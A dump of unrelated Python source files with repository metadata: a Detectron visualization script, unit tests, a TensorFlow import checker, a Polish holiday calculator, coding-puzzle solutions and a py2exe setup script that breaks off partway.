"[email protected]"
] | |
5fdf39560b8a0d61d2147c8f2ef8cd92fa18f88c | acba214b085dc887cff4398f308e9128667e84cb | /tools/visualize_pickle.py | 9805c22fd25d16bc02db1823f2af8305d00977da | [
"MIT"
] | permissive | achalddave/segment-any-moving_detectron | 4e97e8b78ff1d3e7dab2b39a2491f8f565275e11 | cfa2a756fe8aec183e905b14751e5cb82248a383 | refs/heads/master | 2020-06-24T21:42:30.818633 | 2019-07-27T01:20:54 | 2019-07-27T01:20:54 | 199,099,705 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 8,782 | py | """Visualize pickle files output by tools/infer_simple.py.
This can be used, for example, if tools/infer_simple.py was initially called
with `--save_images` set to False. It can also be used if the model needs to
be run on one type of input, but the visualizations make more sense on another
type of input (e.g. if the model runs on optical flow, but we want to visualize
on the raw pixels).
"""
import argparse
import collections
import logging
import pickle
from multiprocessing import Pool
from pathlib import Path
from pprint import pformat
import cv2
import numpy as np
from tqdm import tqdm
import _init_paths # noqa: F401
import datasets.dummy_datasets as datasets
import utils.misc as misc_utils
import utils.vis as vis_utils
from datasets import dataset_catalog
def _set_logging(logging_filepath):
"""Setup root logger to log to file and stdout.
All calls to logging will log to `logging_filepath` as well as stdout.
Also creates a file logger that only logs to , which can
be retrieved with logging.getLogger(logging_filepath).
Args:
logging_filepath (str): Path to log to.
"""
log_format = ('%(asctime)s %(filename)s:%(lineno)4d: ' '%(message)s')
stream_date_format = '%H:%M:%S'
file_date_format = '%m/%d %H:%M:%S'
# Clear any previous changes to logging.
logging.root.handlers = []
logging.root.setLevel(logging.INFO)
file_handler = logging.FileHandler(logging_filepath)
file_handler.setFormatter(
logging.Formatter(log_format, datefmt=file_date_format))
logging.root.addHandler(file_handler)
# Logger that logs only to file. We could also do this with levels, but
# this allows logging specific messages regardless of level to the file
# only (e.g. to save the diff of the current file to the log file).
file_logger = logging.getLogger(logging_filepath)
file_logger.addHandler(file_handler)
file_logger.propagate = False
console_handler = logging.StreamHandler()
console_handler.setFormatter(
logging.Formatter(log_format, datefmt=stream_date_format))
logging.root.addHandler(console_handler)
logging.info('Writing log file to %s', logging_filepath)
def subsample_by_parent_dir(paths, subsample_factor):
"""Subsample files at a specified rate by parent directory.
>>> subsampled_paths = subsample_by_parent_dir(
... [Path(x) for x in
... ['a/1.png', 'a/2.png', 'a/3.png', 'a/4.png', 'b/1.png']])
>>> assert len(subsampled_paths) == 3
>>> assert str(subsampled_paths[0]) == 'a/1.png'
>>> assert str(subsampled_paths[1]) == 'a/4.png'
>>> assert str(subsampled_paths[2]) == 'b/1.png'
"""
if subsample_factor == 1:
return paths
import natsort
endings = collections.defaultdict(lambda: 'th',
{1: 'st', 2: 'nd', 3: 'rd'})
pickles_by_dir = collections.defaultdict(list)
for pickle_file in paths:
pickles_by_dir[pickle_file.parent].append(pickle_file)
num_before_subsampling = len(paths)
paths = []
for dir_pickles in pickles_by_dir.values():
paths.extend(
natsort.natsorted(dir_pickles,
alg=natsort.ns.PATH)[::subsample_factor])
logging.info('Subsampling, visualizing every %s frame (%s / %s frames).' %
(str(subsample_factor) + endings[subsample_factor],
len(paths), num_before_subsampling))
return paths
def visualize(image_or_path, pickle_data_or_path, output_path, dataset,
thresh, show_box=False, show_class=False):
if output_path.exists():
return
if isinstance(image_or_path, np.ndarray):
im = image_or_path
else:
assert image_or_path.exists(), '%s does not exist' % image_or_path
im = cv2.imread(str(image_or_path))
if isinstance(pickle_data_or_path, dict):
data = pickle_data_or_path
else:
with open(pickle_data_or_path, 'rb') as f:
data = pickle.load(f)
vis_utils.vis_one_image(
im[:, :, ::-1], # BGR -> RGB for visualization
output_path.stem,
output_path.parent,
data['boxes'],
data['segmentations'],
data['keypoints'],
dataset=dataset,
box_alpha=1.0 if show_box else 0.0,
show_class=show_class,
thresh=thresh,
kp_thresh=2,
dpi=300,
ext='png')
def visualize_unpack(args):
return visualize(**args)
def main():
# Use first line of file docstring as description if it exists.
parser = argparse.ArgumentParser(
description=__doc__.split('\n')[0] if __doc__ else '',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--pickle-dir', required=True)
parser.add_argument('--images-dir', required=True)
parser.add_argument('--output-dir', required=True)
parser.add_argument('--dataset', required=True, help='training dataset')
parser.add_argument(
'--recursive',
action='store_true',
help="Look recursively in --pickle-dir for pickle files.")
parser.add_argument(
'--images-extension',
default='.png')
parser.add_argument('--threshold', default=0.7, type=float)
parser.add_argument('--num-workers', type=int, default=4)
parser.add_argument(
'--every-kth-frame',
type=int,
default=1,
help=('Visualize every kth frame. Sort all pickle files using '
'a natural sort that will respect frame ordering with typical '
'file names (e.g. "frame001.png" or "001.png" etc.), and '
'only visualize on every k\'th frame. If --recursive is '
'specified, follow this procedure for every directory '
'containing a .pickle file separately.'))
parser.add_argument('--show-box', action='store_true')
parser.add_argument('--show-class', action='store_true')
args = parser.parse_args()
if args.images_extension[0] != '.':
args.images_extension = '.' + args.images_extension
images_root = Path(args.images_dir)
pickle_root = Path(args.pickle_dir)
assert images_root.exists(), '--images-root does not exist'
assert pickle_root.exists(), '--pickle-root does not exist'
output_root = Path(args.output_dir)
output_root.mkdir(parents=True, exist_ok=True)
_set_logging(str(output_root / 'visualization.log'))
logging.info('Args: %s', pformat(vars(args)))
if args.dataset not in dataset_catalog.DATASETS:
raise ValueError("Unexpected args.dataset: %s" % args.dataset)
dataset_info = dataset_catalog.DATASETS[args.dataset]
if dataset_catalog.NUM_CLASSES not in dataset_info:
raise ValueError(
"Num classes not listed in dataset: %s" % args.dataset)
if dataset_info[dataset_catalog.NUM_CLASSES] == 2:
dataset = datasets.get_objectness_dataset()
elif dataset_info[dataset_catalog.NUM_CLASSES] == 81:
dataset = datasets.get_coco_dataset()
if args.recursive:
detectron_outputs = list(pickle_root.rglob('*.pickle')) + list(
pickle_root.rglob('*.pkl'))
else:
detectron_outputs = list(pickle_root.glob('*.pickle')) + list(
pickle_root.rglob('*.pkl'))
if args.every_kth_frame != 1:
detectron_outputs = subsample_by_parent_dir(detectron_outputs,
args.every_kth_frame)
relative_paths = [x.relative_to(pickle_root) for x in detectron_outputs]
images = [
images_root / x.with_suffix(args.images_extension)
for x in relative_paths
]
outputs = [output_root / x.with_suffix('.png') for x in relative_paths]
tasks = []
for image_path, pickle_path, output_path in zip(images, detectron_outputs,
outputs):
if output_path.exists():
continue
output_path.parent.mkdir(exist_ok=True, parents=True)
tasks.append({
'image_or_path': image_path,
'pickle_data_or_path': pickle_path,
'output_path': output_path,
'dataset': dataset,
'thresh': args.threshold,
'show_box': args.show_box,
'show_class': args.show_class
})
if not tasks:
logging.info('Nothing to do! Exiting.')
return
if args.num_workers == 0:
list(map(visualize_unpack, tqdm(tasks)))
else:
args.num_workers = min(args.num_workers, len(tasks))
pool = Pool(args.num_workers)
results = pool.imap_unordered(visualize_unpack, tasks)
list(tqdm(results, total=len(tasks))) # Show progress bar
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
6684bd853d6ef7bafa5052fab25a9722778e5c79 | a193a941a9f70dd0aa46e7a402265bfff27bb075 | /tests/codecs/formats/test_wav.py | ea60a4ef2fba103e2ff55f42f4466be82d316a33 | [
"0BSD"
] | permissive | hile/oodi | f3c606b5209c2b05e077d9039104df7187ba0b1c | f3a758238033c0a511e1ecffbb4b5bfde70efbda | refs/heads/main | 2023-04-13T07:07:03.535176 | 2023-04-10T07:17:44 | 2023-04-10T07:17:44 | 196,691,234 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | py | """
Unit tests for oodi.codecs.formats.wav module
"""
from pathlib import Path
from oodi.codecs.constants import CodecFormat
from oodi.codecs.formats.wav import Wav
from .validators import validate_codec_properties, TEST_FILENAME_NO_MATCH
TEST_FILENAME_MATCH = f'test case.{CodecFormat.WAV.value}'
def test_codecs_formats_wav_properties(mock_empty_config):
"""
Test properties of the Wav codec class
"""
validate_codec_properties(Wav(mock_empty_config), mock_empty_config.__path__)
def test_codecs_formats_wav_match_file_no_match(mock_empty_config, tmpdir):
"""
Test matching unexpected filename to wav codec
"""
assert Wav(mock_empty_config).match_file(Path(tmpdir.strpath, TEST_FILENAME_NO_MATCH)) is False
def test_codecs_formats_wav_match_file_matches(mock_empty_config, tmpdir):
"""
Test matching a wav filename to wav codec
"""
assert Wav(mock_empty_config).match_file(Path(tmpdir.strpath, TEST_FILENAME_MATCH)) is True
| [
"[email protected]"
] | |
e5071c6b16895e33b46c923d938f1b8ff8361ee1 | b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1 | /tensorflow/tools/test/check_futures_test.py | f0c4d0d47930e2ca716933f9f677440922daf5ca | [
"Apache-2.0"
] | permissive | uve/tensorflow | e48cb29f39ed24ee27e81afd1687960682e1fbef | e08079463bf43e5963acc41da1f57e95603f8080 | refs/heads/master | 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 | Apache-2.0 | 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null | UTF-8 | Python | false | false | 4,053 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Check that TensorFlow python files have certain __future__ imports.
This makes it easier to find Python 2.7 / Python 3.x incompatibility bugs.
In particular, this test makes it illegal to write a Python file that
doesn't import division from __future__, which can catch subtle division
bugs in Python 3.
Note: We can't use tf.test in this file because it needs to run in an
environment that doesn't include license-free gen_blah_ops.py files.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import fnmatch
import os
import re
import six
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))
FUTURES_PATTERN = re.compile(r'^from __future__ import (\w+)\s*$')
FUTURES_PATTERN_2 = re.compile(
r'^from __future__ import (\w+), (\w+), (\w+)\s*$')
FUTURES_PATTERN_3 = re.compile(r'^from __future__ import (\w+) as \w+\s*$')
REQUIRED_FUTURES = frozenset(['absolute_import', 'division', 'print_function'])
WHITELIST = [
'python/platform/control_imports.py',
'tools/docker/jupyter_notebook_config.py',
'tools/ci_build/update_version.py',
'tools/ci_build/copy_binary.py',
]
# Tests that must *not* import division
OLD_DIVISION = [
'python/framework/tensor_shape_div_test.py',
'python/kernel_tests/division_past_test.py',
]
def check_file(path, old_division):
futures = set()
count = 0
for line in open(path, encoding='utf-8') if six.PY3 else open(path):
count += 1
m = FUTURES_PATTERN.match(line)
if not m:
m = FUTURES_PATTERN_3.match(line)
if m:
futures.add(m.group(1))
else:
m = FUTURES_PATTERN_2.match(line)
if m:
for entry in m.groups():
futures.add(entry)
if not count:
return # Skip empty files
if old_division:
# This file checks correct behavior without importing division
# from __future__, so make sure it's doing that.
expected = set(['absolute_import', 'print_function'])
if futures != expected:
raise AssertionError(('Incorrect futures for old_division file:\n'
' expected = %s\n got = %s') %
(' '.join(expected), ' '.join(futures)))
else:
missing = REQUIRED_FUTURES - futures
if missing:
raise AssertionError('Missing futures: %s' % ' '.join(missing))
def main():
# Make sure BASE_DIR ends with tensorflow. If it doesn't, we probably
# computed the wrong directory.
if os.path.split(BASE_DIR)[-1] != 'tensorflow':
raise AssertionError("BASE_DIR = '%s' doesn't end with tensorflow" %
BASE_DIR)
# Verify that all files have futures
whitelist = frozenset(os.path.join(BASE_DIR, w) for w in WHITELIST)
old_division = frozenset(os.path.join(BASE_DIR, w) for w in OLD_DIVISION)
for root, _, filenames in os.walk(BASE_DIR):
for f in fnmatch.filter(filenames, '*.py'):
path = os.path.join(root, f)
if path not in whitelist:
try:
check_file(path, old_division=path in old_division)
except AssertionError as e:
short_path = path[len(BASE_DIR) + 1:]
raise AssertionError('Error in %s: %s' % (short_path, str(e)))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
0fb2282d3b84448e01b5dcc2f4bd64681db1bbb0 | fabc3b3286df0fa98a35ea90d4693d9f38db50a2 | /sendJsonRequest.py | a84652870f3a942e8fd181669bc76831b3cc1e21 | [] | no_license | yangtou45du/openpyxl | 750b5ee23ce8e5cb6826b8cc137012fbf2a5d9cb | 87eef380391e60eab81f93c7742d1c21b1d029de | refs/heads/master | 2020-03-16T21:59:35.078761 | 2018-05-31T03:42:03 | 2018-05-31T03:42:03 | 133,022,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | import requests
import json
class sendRequest():
def POST(self,url,dict):
re=requests.post(url,json=dict)
return re.text
if __name__ == '__main__':
url="http://221.236.20.217:8093/pcl/services/loanCenter/account/queryPaymentHistory"
dict={
"params": {
"loanNo": "000002017090601542",
"isPage":1,
"pageSize":"10",
"pageNo":"1"
}
}
f=sendRequest().POST(url,dict)
| [
"[email protected]"
] | |
b2b7e8daf9b2c2a4bda8d9a8c6010bce4bba22d7 | 42b324291b51b14e284a8c5e14270a4e9446737a | /test27.py | c4d5021a0c518bc02be33130f9503d78c638d5d9 | [] | no_license | christinecoco/python_test | 3f7505c85711eb6bff27cbc68bfd3fd9829a843d | 6d6c519e237f1d9e7243e3e6378a0ca44af98439 | refs/heads/master | 2020-05-23T22:26:58.341688 | 2019-05-16T07:23:28 | 2019-05-16T07:23:28 | 186,973,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | #将用户输入的5个字符以相反顺序打印出来
def pri():
l=[]
l.extend(n)
l.reverse()
return l
n=input('请输入5个字符:')
print(pri()) | [
"[email protected]"
] | |
59773eb3cc899c7e48f6283380f46e6b5d8902c3 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Projects/pyinstaller/tests/old_suite/interactive/test_pygame.py | bc4b2ab4e66186771f7e4675c2622bd8225cad3d | [
"LicenseRef-scancode-other-permissive"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:82d416a54f2704d7f86702c9d4fca758c3922aabd54f55bd79bc5d55d8cb8592
size 8156
| [
"[email protected]"
] | |
8a43127609e4f347391453d0dab8d410e2ee6d3d | dc456b315dc6988fbc37a92e8c1af8987205c9fa | /holiday/countries/poland.py | 5d59cee331e259533d6991ba00d5467cc7251f70 | [
"MIT"
] | permissive | Lionbridge-Technologies/holiday | 83bf8e0d665828e75429b519e3b85294475ecb64 | e8fa1628efdc81ed2f3452cf7009de605968cb76 | refs/heads/master | 2021-01-13T08:58:09.830066 | 2013-11-10T21:50:58 | 2013-11-10T21:50:58 | 69,601,979 | 0 | 1 | null | 2016-09-29T19:46:17 | 2016-09-29T19:46:16 | null | UTF-8 | Python | false | false | 1,582 | py | # -*- coding: utf-8 -*-
'''Holiday information for Poland. Adapted from
https://gist.github.com/sebzur/1810707
'''
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from datetime import date, timedelta
from dateutil import easter
from dateutil.relativedelta import relativedelta, SU, TH
def get_holidays(year, place=['Poland', None, None], scope='legal', _=str):
"""Returns Polish holiday dates (legally considered non-working days)."""
easter_sunday = easter.easter(year)
return {
date(year, 1, 1): _('New Year'),
date(year, 1, 6): _('Trzech Kroli'),
easter_sunday: _('Easter Sunday'),
easter_sunday + timedelta(days=1): _('Easter Monday'),
date(year, 5, 1): _('Labor Day'),
date(year, 5, 3): _('Constitution Day'),
# 7th Sunday after Easter
# (notice days+1 - this is 7th Sunday excluding Easter Sunday
easter_sunday + relativedelta(days=+1, weekday=SU(+7)):
_('Pentecost Sunday'),
# 9th Thursday after Easter
easter_sunday + relativedelta(weekday=TH(+9)):
_('Corpus Christi'),
date(year, 8, 15): _('Assumption of the Blessed Virgin Mary'),
date(year, 11, 1): _("All Saints' Day"),
date(year, 11, 11): _('Independence Day'),
date(year, 12, 25): _('Christmas Day'),
date(year, 12, 26): _('Boxing Day'),
} # What the hell, you don't celebrate Chopin's birthday???
if __name__ == "__main__":
from pprint import pprint
pprint(get_holidays(2014))
| [
"[email protected]"
] | |
2d40f0bfb1b559ceab1fa73202905567d7c26083 | 24c5c46f1d281fc15de7f6b72a5148ae85f89fb4 | /SRC/demo/imooc/imooc_advanced/对象迭代与反迭代/part5.py | 3baf32b97753c3d1764be42a9bf4906e61683e3c | [] | no_license | enterpriseih/easyTest | 22d87c7ffe40fb10a07f7c5cdd505f63dd45adc0 | 43b8d294e898f25055c78313cfece2753352c250 | refs/heads/master | 2023-08-23T22:55:14.798341 | 2020-02-11T09:13:43 | 2020-02-11T09:13:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 753 | py | # 如何对迭代器做切片操作
# 实际案例:有某个文本文件,我们想读取其中某范围的内容如100~300行之间的内容,
# python中文本文件是可迭代对象,我们是否可以使用类似列表切片的方式得到一个
# 100~300行文件内容的生成器?
# f=open('')
# f[100:300] 可以吗
# 使用标准库中的itertools.islice,它能返回一个迭代对象切片的生成器
from itertools import islice
f=open('part1.py',encoding='utf-8')
# for x in f:
# print(f.readline())
for line in islice(f,2,5):
print(line)
# islice(f,2) #前2行
# islice(f,2,None) #2行到最后
#消耗原生成器
l=range(20)
t=iter(l)
for x in islice(t,4,8,1):
print(x,end=' ')
print()
for x in t:
print(x,end=' ')
| [
"yaolihui0506"
] | yaolihui0506 |
21f5c6a34e88da9ea700f99dfdcc7834a7aefe05 | 6ead0d3997aa3470fc6f49c6ccc0ac8f808ae5d7 | /problems/python/findPeakElement.py | 54ddbd13b948a36ca234c81c0125b7d55d9dc703 | [] | no_license | ikedaosushi/leetcode | d405455bfffda3057259da78783901feb56d9f76 | d378f2dc5f0b2df1f00208e304979ac0f53ab385 | refs/heads/master | 2021-06-24T04:31:56.586685 | 2020-12-08T13:51:18 | 2020-12-08T13:51:18 | 178,659,078 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | from typing import List
class Solution:
def findPeakElement(self, nums: List[int]) -> int:
if len(nums) <= 1:
return 0
if nums[0] > nums[1]:
return 0
if nums[-2] < nums[-1]:
return len(nums) - 1
i = 1
while i < len(nums) - 1:
if nums[i] > nums[i+1]:
if nums[i-1] < nums[i]:
return i
i += 1
i += 1
return 0
| [
"[email protected]"
] | |
251e492a5dd723d7807866355d7f4487306bc38d | 0a7711063b30b1566ade3cc07f105292e32fe6d6 | /scrapy_test/aggregates/apartment/tests/integration/test_apartment_behavior.py | 2c4e1054d5b46d3ecaff69fa4cd40a24006fb188 | [] | no_license | huokedu/dynamic-scrapy | e150a1fc6894e39d6bae37c602a592d57cd22c51 | 31a47e9810f2039cfe33653e09d7d03242764723 | refs/heads/master | 2021-01-17T21:33:17.810250 | 2013-10-05T17:28:19 | 2013-10-05T17:28:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 774 | py | import pytest
from scrapy_test.aggregates.apartment.services import apartment_service
from scrapy_test.aggregates.listing.models import Listing
from scrapy_test.aggregates.listing.services import listing_service
from scrapy_test.aggregates.listing.tests import listing_test_data
@pytest.mark.django_db_with_migrations
def test_apartment_publishes_notified_unavailable():
listing_id = listing_service.create_listing(**listing_test_data.cl_listing_4033538277).id
listing = Listing.objects.get(pk=listing_id)
apartment = listing.apartment
apartment_service.notify_unavailable(apartment)
assert apartment.is_available == False
listings = Listing.objects.filter(apartment=apartment).values_list('is_deleted', flat=True)
assert all(f == True for f in listings)
| [
"[email protected]"
] | |
12808eccde179a2a86faac55bccb1419289b162f | cc20c7658fdf4fa7506625c9efdae792dfd857ce | /src/visionlouisville/utils.py | 8f17dc56324ff01681c7cff2368133b2fa2a242e | [] | no_license | openplans/visionlouisville | 4a9972adc97af0048c4f7c0cd8f642bef59e69cf | e4dc182d061866e80ae140a887bba1b0e967753c | refs/heads/master | 2020-05-20T13:25:47.273430 | 2013-10-24T16:27:47 | 2013-10-24T16:27:47 | 10,971,764 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | from django.conf import settings
from itertools import combinations, islice
from random import randint
def uniquify_tweet_ids(queryset):
"""Ensure that the tweet_ids of all items in the queryset are unique"""
all_different = False
while not all_different:
all_different = True
for referrence, other in combinations(queryset, 2):
if reference.tweet_id == other.tweet_id:
all_different = False
other.tweet_id = str(randint(0, 9999999999999999))
other.save()
def chunk(iterable, n):
"""Collect data into fixed-length chunks"""
it = iter(iterable)
while True:
item = list(islice(it, n))
if item: yield item
else: break
def settings_context(request):
return {'settings': settings} | [
"[email protected]"
] | |
9c6f84e5b09a323ccaef53d84b0b723bb457f244 | 11286e7989264134a8a8d610e0f609e6fbff9140 | /ch13/ch13_21.py | 9e23fcd51d42b42990d05ad987311aa76e6f5225 | [] | no_license | p2c2e/machine_learning_with_python_cookbook | 04eeed2e00e0a3e9c0681d4b2f4125aa85485a1d | b176323a02f5b5722e312a579ad764a0276ec9c6 | refs/heads/main | 2023-01-30T06:54:34.138786 | 2020-12-13T05:02:07 | 2020-12-13T05:02:07 | 320,987,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31 | py | # View coefficients
model.coef_ | [
"[email protected]"
] | |
19e37018d09be7a049a1eb9e51bdf5f7e821a01a | 46c38a849a96ca868b1efaa8280be7416e15f952 | /goslinks/blueprints/auth.py | 3fc63ffc1366208b6bd7351e53fdf2521ccce5a9 | [
"ISC"
] | permissive | RevolutionTech/goslinks | 066b7f08a05bb68b6440bab4e670e537d0f1960f | fedb91a0d4ab227ba926f4588c7feeb3af284d2b | refs/heads/main | 2023-02-20T17:25:50.052529 | 2021-10-16T23:19:28 | 2021-10-16T23:19:28 | 184,518,945 | 1 | 0 | ISC | 2023-02-08T00:51:24 | 2019-05-02T04:07:12 | Python | UTF-8 | Python | false | false | 500 | py | from flask import Blueprint, redirect, session
from goslinks.auth.constants import AUTH_EMAIL_KEY, AUTH_NEXT_URL_KEY
from goslinks.auth.decorators import no_cache
bp = Blueprint("auth", __name__)
@bp.route("/logout/")
@no_cache
def logout():
# Deprecated session variables, to be removed after 2020/10/13
session.pop("auth_token", None)
session.pop("auth_state", None)
session.pop(AUTH_NEXT_URL_KEY, None)
session.pop(AUTH_EMAIL_KEY, None)
return redirect("/", code=302)
| [
"[email protected]"
] | |
269883af7e8c26cec4f9f1501eb31440733b33e5 | 2534803a09f5a6676ccece4519a2b8faaea9329d | /zeno/test/propagate/helper.py | dc33a738b861d6a9fd3e317a8adb5d9b0f2649da | [
"Apache-2.0"
] | permissive | SmithSamuelM/plenum | c41ccb849cd1113ba8496fa8bd9b0c5336ee9878 | 2675523f8718d6f240027582bc90c76b4f80c105 | refs/heads/master | 2021-01-15T23:35:53.640499 | 2016-02-16T05:01:22 | 2016-02-16T05:01:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 580 | py | from zeno.common.request_types import Propagate
from zeno.test.helper import TestNode, getAllArgs
def sentPropagate(node: TestNode):
params = getAllArgs(node, TestNode.send)
return [p for p in params if isinstance(p['msg'], Propagate)]
def recvdPropagate(node: TestNode):
return getAllArgs(node,
TestNode.processPropagate)
def recvdRequest(node: TestNode):
return getAllArgs(node,
TestNode.processRequest)
def forwardedRequest(node: TestNode):
return getAllArgs(node,
TestNode.forward)
| [
"[email protected]"
] | |
7d3f4e0a5031f9ce618c568b440c7425489060a1 | 16631cf7cd4a70f2cd2750851649d3eff5e17724 | /2019/day06/part1.py | d5325cb19e7543fcf23dde0b345f5a8f5535efa1 | [] | no_license | kynax/AdventOfCode | 1dd609a3308d733f2dd7d4ea00508d2da73180b9 | 36a339241dd7a31ebe08a73e5efa599e5faeea1a | refs/heads/master | 2022-12-21T13:32:52.591068 | 2022-12-16T22:41:30 | 2022-12-16T22:41:30 | 48,439,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,048 | py | import sys
class Obj:
def __init__(self, name):
self.name = name
self.down = []
def add_child(self, obj):
self.down.append(obj)
def prnt(self, prev):
if not self.down:
print(prev + '=' + self.name)
else:
for d in self.down:
d.prnt(prev + '-' + self.name)
def distance(self, start):
d = start
if not self.down:
print(self.name, start)
for n in self.down:
d += n.distance(start + 1)
return d
COM = Obj('COM')
orbits = {}
orbits['COM'] = COM
effects = [x.strip().split(')') for x in list(sys.stdin)]
for c,o in effects:
obj = None
if o in orbits:
obj = orbits[o]
else:
obj = Obj(o)
orbits[o] = obj
if c in orbits:
orbits[c].add_child(obj)
else:
ctr = Obj(c)
ctr.add_child(obj)
orbits[c] = ctr
print(COM.distance(0))
| [
"[email protected]"
] | |
dc099d384ffc6b9326adbfb10628a62857513c67 | cbc829f5787b770c9184b91ee470d058cc4cbe65 | /backtrack/46_全排列.py | b21c5927665b36a64df5503725fa3d085639de52 | [] | no_license | SilvesSun/learn-algorithm-in-python | 58815e7e85e767cbc4a9c21e36e7bdede4f32bef | 5ba3465ba9c85955eac188e1e3793a981de712e7 | refs/heads/master | 2022-09-19T05:10:26.783943 | 2022-09-10T04:56:43 | 2022-09-10T04:56:43 | 115,470,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | class Solution(object):
def permute(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
if not nums:
return
res = []
def backtrack(_nums, track):
if not _nums:
res.append(track[:])
return
for i in range(len(_nums)):
track.append(_nums[i])
backtrack(_nums[:i] + _nums[i+1:], track)
track.pop()
backtrack(nums, [])
return res
if __name__ == '__main__':
s = Solution()
print(s.permute([1, 2, 3])) | [
"[email protected]"
] | |
6d58a136326125dd005d704027df47e4a4e76d85 | f03064e9f7fbd5d0344812fae45439905627f2a8 | /helga/general/setup/helga_launcher/setup.py | 4b09fe648d4121ba266e1af75a5d51617b7b9c7d | [] | no_license | tws0002/helga | 45324a4acfde5054c452329de8cfdd38de4f8bda | 80f44393a5f1b3038d4ce3dc5057989ad7d3ef28 | refs/heads/master | 2021-01-12T17:21:04.802566 | 2015-04-16T20:39:06 | 2015-04-16T20:39:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,150 | py |
"""
setup
=====
Helper module for py2exe to build a distribution.
-----------------------
**Author:** `Timm Wagener <mailto:[email protected]>`_
"""
#win32com py2exe shell fix
#------------------------------------------------------------------
try:
#import module finder
try:
#from py2exe
import py2exe.mf as modulefinder
except ImportError:
#else default
import modulefinder
#default imports
import win32com
import sys
for path in win32com.__path__[1:]:
modulefinder.AddPackagePath("win32com", path)
for extra in ["win32com.shell"]: #,"win32com.mapi"
__import__(extra)
m = sys.modules[extra]
for path in m.__path__[1:]:
modulefinder.AddPackagePath(extra, path)
except ImportError:
# no build path setup, no worries.
pass
#Import
#------------------------------------------------------------------
#python
import sys
import os
from distutils.core import setup
from glob import glob
import shutil
#py2exe
import py2exe
#Import protection
#------------------------------------------------------------------
if (__name__ == '__main__'):
#Only execute script if it is not imported
#Variables
#------------------------------------------------------------------
#application_name
application_name = 'HelgaLauncher'
#application_version
application_version = '0.1'
#author_name
author_name = 'Timm Wagener'
#msvc_library_directory
msvc_library_directory = r'C:/Program Files (x86)/Microsoft Visual Studio 9.0/VC/redist/amd64/Microsoft.VC90.CRT'
#include_list
include_list = ['sip']
#exclude_list
exclude_list = ['PyQt4.uic.port_v3']
#dll_exclude_list
dll_exclude_list = ['MSVCP90.dll']
#data_files_list
data_files_list = [
('media', ['media/helga_launcher.ui']),
('media/icons', ['media/icons/icon_helga_launcher.png',
'media/icons/icon_dcc_button_maya.png',
'media/icons/icon_dcc_button_maya_hover.png',
'media/icons/icon_dcc_button_maya_drag.png',
'media/icons/icon_dcc_button_houdini.png',
'media/icons/icon_dcc_button_houdini_hover.png',
'media/icons/icon_dcc_button_houdini_drag.png',
'media/icons/icon_dcc_button_nuke.png',
'media/icons/icon_dcc_button_nuke_hover.png',
'media/icons/icon_dcc_button_nuke_drag.png',
'media/icons/icon_dcc_button_hiero.png',
'media/icons/icon_dcc_button_hiero_hover.png',
'media/icons/icon_dcc_button_hiero_drag.png',
'media/icons/icon_dcc_button_doc.png',
'media/icons/icon_dcc_button_doc_hover.png',
'media/icons/icon_dcc_button_doc_drag.png'
]),
('data', ['data/pipeline_base_data.yaml',
'data/pipeline_base_data_sandbox.yaml',
'data/pipeline_base_data_home.yaml',
'data/pipeline_base_data_home_sandbox.yaml'
])
]
#MSVC Libraries
#------------------------------------------------------------------
#if msvc_library_directory exists copy .dlls into py2exe bundle
if (os.path.isdir(msvc_library_directory)):
#msvc_library_tuple
msvc_library_tuple = ("Microsoft.VC90.CRT", glob(msvc_library_directory + r'/*.*'))
#append
data_files_list.append(msvc_library_tuple)
#setup
#------------------------------------------------------------------
#options_dict
options_dict = dict(
ascii = False, # Exclude encodings
includes = include_list,
excludes = exclude_list, # Exclude standard library
dll_excludes = dll_exclude_list, # Exclude 'MSVCP90.dll'
compressed = True, # Compress library.zip
dist_dir = application_name
)
#build_dict
build_dict = dict(
build_base = application_name + '_build'
)
#setup
setup(
name = application_name,
version = application_version,
description = 'Pipeline tools launcher.',
author = author_name,
console = ['helga_launcher_loader.py'],
data_files = data_files_list,
options = {
'build': build_dict,
'py2exe': options_dict
}
)
#Remove build directory
#------------------------------------------------------------------
try:
#setup_module_file
setup_module_file = os.path.realpath(sys.argv[0])
#setup_module_dir
setup_module_dir = os.path.dirname(setup_module_file)
#batch_dir
